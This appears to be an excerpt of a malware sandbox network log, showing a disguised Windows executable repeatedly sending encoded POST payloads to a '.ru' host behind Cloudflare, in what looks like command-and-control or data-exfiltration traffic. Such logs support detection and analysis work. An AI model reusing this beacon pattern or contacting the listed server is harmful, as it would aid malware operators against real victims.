Jan 9, 2025 18:13:42.831862926 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:43.190541029 CET	1012	OUT	Data Raw: 55 55 5e 59 5d 45 55 5f 59 58 51 54 5b 53 57 5c 5f 57 58 59 52 5f 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU^Y]EU_YXQT[SW\_WXYR_ZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#-#/>]><,7 $,T![5T%=V1+?Y7<'^(:'\"/Y.8
Jan 9, 2025 18:13:43.284492016 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:43.469650984 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8sSdxv0u8GX0ipci%2BwsAnd3IyKUYUSowWgH1XsjWA9d0ehXd4%2FQIk9O4McwoMjH7CG1IKW7qS4iUCR3fNAqnBOzz3M3ybeZEXvxvXBfg5awhXfHRUm0ZWoqGDVl5vsSxsA%2FMzKS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f3d4d4fc463-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2788&min_rtt=1490&rtt_var=3155&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=122916&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50119	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:43.599731922 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:43.956227064 CET	1012	OUT	Data Raw: 55 54 5b 5a 58 42 55 56 59 58 51 54 5b 57 57 51 5f 54 58 5e 52 59 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UT[ZXBUVYXQT[WWQ_TX^RYZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X.!<.? ;]88?X %;^(W6=$09& 4,$+'\"/Y.(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50120	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:43.996736050 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1264 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:44.346693039 CET	1264	OUT	Data Raw: 50 5e 5b 58 5d 47 55 54 59 58 51 54 5b 50 57 5d 5f 56 58 5c 52 5c 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^[X]GUTYXQT[PW]_VX\R\ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#* )7Z"]=#(;8+X ;Z) 5-10%T%]'7+\+*'\"/Y.4
Jan 9, 2025 18:13:44.442431927 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:44.736268997 CET	951	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hF2K%2B8c1zIOStctTTjSczTqJXXk3AoBaTuyiCMxQrDJLSXpjObySCSlrP9Sd1W5GnFJVTM%2BYmFCZOSKMhUAJDR3TTA36Aiw63FGJc3B25PmVOZ5tffRuOpaeuDWEZCKEhDBBy7Hj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f448eb17cf0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4720&min_rtt=1891&rtt_var=6368&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1589&delivery_rate=59523&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 22 01 26 1c 20 0b 30 3c 09 1e 31 0f 25 57 36 21 2e 5d 2c 00 0e 45 22 3a 2f 58 2c 21 3d 12 36 3f 05 16 24 0b 2a 0f 25 2f 23 51 21 0c 21 5d 01 12 24 5d 27 07 21 05 24 3e 30 5b 31 38 0d 41 37 00 06 12 24 28 2e 17 32 30 34 57 22 3d 08 0d 29 04 3e 05 2f 2c 2f 07 3b 09 28 13 3c 03 2b 51 0e 10 22 18 27 3d 35 05 2b 00 23 11 25 22 3c 54 3d 01 3f 5b 24 3c 2f 0c 3d 39 01 0f 33 39 1a 1d 23 06 28 5a 2b 2a 38 5d 33 16 0b 1b 2a 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"& 0<1%W6!.],E":/X,!=6?$%/#Q!!]$]'!$>0[18A7$(.204W"=)>/,/;(<+Q"'=5+#%"<T=?[$</=939#(Z+8]3*8 \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50121	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:44.369479895 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:44.721671104 CET	1012	OUT	Data Raw: 55 50 5e 58 58 47 55 55 59 58 51 54 5b 52 57 51 5f 54 58 5c 52 5c 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UP^XXGUUYXQT[RWQ_TX\R\ZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#9 )=U+\/(#4<=$">=R2-R287^7?<'\"/Y.
Jan 9, 2025 18:13:44.812774897 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:45.290565014 CET	797	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1Wlir2mqLJIrYQn09SVZyy8Ld38Z40NGUJrqLZPAVjPm0lpXCgJLPWdZvM9JeX46eRPL7E30fEXDJY89ZkmDtN51HPZB5m1U2uEthOA%2BKMb7yMZX0FreUydm5JCHwl%2FsqRyVNme"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f46da7918d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1497&rtt_var=736&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=664542&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:13:45.423405886 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50122	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:45.553550005 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:45.909188032 CET	1012	OUT	Data Raw: 50 5f 5e 58 5d 45 50 57 59 58 51 54 5b 56 57 56 5f 5d 58 59 52 59 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_^X]EPWYXQT[VWV_]XYRYZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z +#Y4/.X3?X;04C;_+,S"V% )S&(( ;?:'\"/Y.,
Jan 9, 2025 18:13:46.033624887 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:46.309616089 CET	808	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PfHJD5fi%2BgbkNSjrWoOvjTY3D0gCMhnWapZSN9Ow20YuYEsN8AIs3KWLOzsM8%2Fgj2AFi%2FOw7JwKTE79kD%2FJFlhHmxq3OConHEGQJFsv0mjeKhTTEJonbyKIuLxzy%2B8XkEOJr00RF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f4e5d3e437a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4993&min_rtt=1660&rtt_var=7288&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=51546&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50123	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:46.442445993 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:46.802495956 CET	1012	OUT	Data Raw: 50 52 5b 54 58 43 55 52 59 58 51 54 5b 57 57 50 5f 5c 58 5b 52 5e 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[TXCURYXQT[WWP_\X[R^ZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )3.#>\);Z8(7#)(W!%S&3&&4?7\+'\"/Y.(
Jan 9, 2025 18:13:47.191937923 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:47.890285969 CET	808	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o9xXy5H32uDh2c9sZ1ArCmlqojgpRkYnHHiYl35xXRQt5%2BBf9YM4KgIiwI6MPNf2e%2Blh8GVl%2BGb5cy7jx3hS6UVRRGxbNFc8IkJs3NaF7qlLHZkYzl583TE0OlqztgYmf6d0Ggct"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f55abfd42da-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=120696&min_rtt=57545&rtt_var=65087&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=25371&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50124	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:48.019498110 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:48.377918005 CET	1012	OUT	Data Raw: 55 52 5b 55 5d 47 55 5f 59 58 51 54 5b 50 57 52 5f 52 58 55 52 59 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR[U]GU_YXQT[PWR_RXURYZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )5\!/:=#3[8,#^)$"%$ 91+Z4/^)'\"/Y.4
Jan 9, 2025 18:13:48.463836908 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:48.717967987 CET	813	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhTOQPUk%2FnV7UIU5MlFSSN726WAcLkSbZRbtA%2Bb5Y%2F0lYT8X4bLa8qhuaxbMqOu%2F%2FlalzgMNJNMorbeiecqeZ7CspUffa1MEKSOvg%2B6sKC08Jz5Mf74ag16T7lT6mcTYDNLma8cN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f5daed80c84-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3136&min_rtt=1657&rtt_var=3580&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=108196&cwnd=149&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50125	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:48.847629070 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:49.206350088 CET	1012	OUT	Data Raw: 50 51 5b 59 58 47 50 53 59 58 51 54 5b 50 57 53 5f 55 58 58 52 53 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ[YXGPSYXQT[PWS_UXXRSZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *=Y /%=0 ,$78)9;"-"2=U$;#<8<'\"/Y.4
Jan 9, 2025 18:13:49.290859938 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:49.548552036 CET	809	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BrpZuRppdO8lu7vmemIMBlqwbeE9nti%2ByP79oAIfaE9T0zgPC2pJLMRh6jkhQKTPl687jxDsdiErVTiEoumb%2FebXHdhoypsaMWq73FsL3U141Lmaqkt8yYn%2BRpPXI92ywJLaAQ1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f62dab042bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2652&min_rtt=1744&rtt_var=2470&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=162042&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50126	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:49.777858973 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50127	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:50.009423971 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:50.362382889 CET	1012	OUT	Data Raw: 50 52 5b 5f 5d 44 50 53 59 58 51 54 5b 50 57 56 5f 55 58 5c 52 58 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[_]DPSYXQT[PWV_UX\RXZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#>!]!<\>\;7#("[5T% 1R247?\<'\"/Y.4
Jan 9, 2025 18:13:50.453035116 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:50.940092087 CET	803	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4H65MLoZ5%2Br8zLbnu6nGsJKL%2F0EmL3zG%2BbfirYqR6D83m5enmPhRlVEfX6fXllNHxlGDKKPP15oukjeL2ghZJVICRWFNfL3ciamPsMQJ3QbC1gT8iY97rlt%2BCn%2BwcTdaB7MdSl4K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f6a1f1118c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1491&rtt_var=898&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=512460&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:13:51.071110964 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50128	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:51.195530891 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:51.552732944 CET	1012	OUT	Data Raw: 55 54 5e 5c 5d 43 55 5e 59 58 51 54 5b 53 57 55 5f 50 58 5f 52 5f 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UT^\]CU^YXQT[SWU_PX_R_ZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z > 64?0'Y/##Z+)<U!1 -T1;(4<+(*'\"/Y.8
Jan 9, 2025 18:13:51.712847948 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:52.024873972 CET	804	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JfPiIGUDUMreHLaNGMbVyG3cLWNh34ZWpfu3u9CbU8hmhX5KrAqj85aTrTsj%2FjR1Jw5UhXtpBmUjxwx7FR1WFqyyTgPdzCfeSP6o1l9upohX2Kr%2FGrAon5b6jLqr3G%2FL2UXXO8V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f71ff7442d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4196&min_rtt=1760&rtt_var=5532&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=68702&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50129	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:52.153335094 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
